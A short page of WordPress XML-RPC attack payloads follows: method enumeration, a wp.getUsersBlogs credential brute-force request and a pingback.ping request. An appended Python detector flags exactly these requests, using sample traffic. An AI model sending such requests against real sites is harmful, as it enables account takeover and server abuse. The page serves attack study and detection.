XMLRPC Attack

Method List

<methodCall>
  <methodName>system.listMethods</methodName>
  <params></params>
</methodCall>

User Brute Force

<methodCall>
  <methodName>wp.getUsersBlogs</methodName>
  <params>
    <param>
      <value>admin</value>
    </param>
    <param>
      <value>pass</value>
    </param>
  </params>
</methodCall>

Pingback Vulnerability

<?xml version="1.0" encoding="iso-8859-1"?>
<methodCall>
  <methodName>pingback.ping</methodName>
  <params>
    <param>
      <value><string>http://source/url/here</string></value>
    </param>
    <param>
      <value><string>http://target/url/here</string></value>
    </param>
  </params>
</methodCall>
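
Detection

A defender-side view of the three requests above, as an added example that is not part of the original page: it classifies POST bodies sent to xmlrpc.php by methodName and flags method enumeration, repeated wp.getUsersBlogs logins from one client, and pingback.ping calls. The function names, the threshold of 3, and the sample IP addresses, credentials and URLs are assumptions constructed for illustration.

```python
import xml.etree.ElementTree as ET
from collections import Counter

def parse_call(body: bytes):
    """Return (methodName, [top-level param values]) or None if unusable."""
    if b"<!DOCTYPE" in body or b"<!ENTITY" in body:
        return None  # XML-RPC needs no DTD; refuse rather than expand entities
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None
    if root.tag != "methodCall":
        return None
    name = (root.findtext("methodName") or "").strip()
    return name, ["".join(v.itertext()).strip() for v in root.findall("params/param/value")]

def analyze(requests, guess_threshold=3):
    """requests: iterable of (client_ip, raw POST body). Returns [(ip, finding)]."""
    guesses, alerts = Counter(), []
    for ip, body in requests:
        call = parse_call(body)
        name, params = call or ("", [])
        if call is None:
            alerts.append((ip, "malformed or DTD-bearing body"))
        elif name == "system.listMethods":
            alerts.append((ip, "method enumeration"))
        elif name == "wp.getUsersBlogs":
            guesses[ip] += 1
            if guesses[ip] == guess_threshold:  # alert once per client
                alerts.append((ip, "repeated wp.getUsersBlogs logins"))
        elif name == "pingback.ping" and len(params) == 2:
            alerts.append((ip, "pingback.ping source=" + params[0]))
    return alerts

def _call(method, *args):  # helper that builds a constructed methodCall body
    params = b"".join(b"<param><value>" + a + b"</value></param>" for a in args)
    return b"<methodCall><methodName>" + method + b"</methodName><params>" + params + b"</params></methodCall>"

# Constructed sample traffic: documentation IP ranges, made-up credentials and URLs.
SAMPLE = [
    ("192.0.2.10", _call(b"system.listMethods")),
    *[("192.0.2.10", _call(b"wp.getUsersBlogs", b"admin", p)) for p in (b"pw1", b"pw2", b"pw3")],
    ("198.51.100.7", _call(b"pingback.ping", b"<string>http://source.example/a</string>",
                           b"<string>http://blog.example/post</string>")),
    ("203.0.113.5", b"<!DOCTYPE x><methodCall/>"),
]

if __name__ == "__main__":
    print(*analyze(SAMPLE), sep="\n")
```

The login counter here has no time window; in production it would be reset per interval and fed from the web server's request log or a WAF body capture.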
